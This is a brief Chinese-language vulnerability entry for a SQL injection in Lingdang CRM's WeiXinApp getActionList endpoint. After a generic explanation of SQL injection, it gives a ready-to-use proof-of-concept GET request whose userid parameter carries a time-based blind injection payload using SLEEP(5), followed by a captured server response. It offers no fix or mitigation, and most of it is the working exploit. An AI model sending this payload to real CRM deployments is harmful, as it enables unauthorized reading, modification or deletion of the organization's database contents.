漏洞描述
SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,从而绕过应用程序的安全措施,直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下,使得攻击者能够获取、修改或删除数据库中的数据,甚至可能执行服务器上的任意代码。
灵当CRM getActionList SQL注入漏洞
PoC代码
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 08:15:24 GMT
Server: Apache
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
{"code":1,"result":{"count":{"look_nums":"0","share_nums":"0","copy_nums":"0","like_nums":"0"},"curpagenum":1,"search_reminds":"搜索用户昵称关键字","totalrows":null,"page_title":{"like":"点赞","look":"浏览","share":"分享","copy":"领取"},"pagecount":0,"havenextpage":"no","list":[]},"msg":"success","appname":"灵当软件"}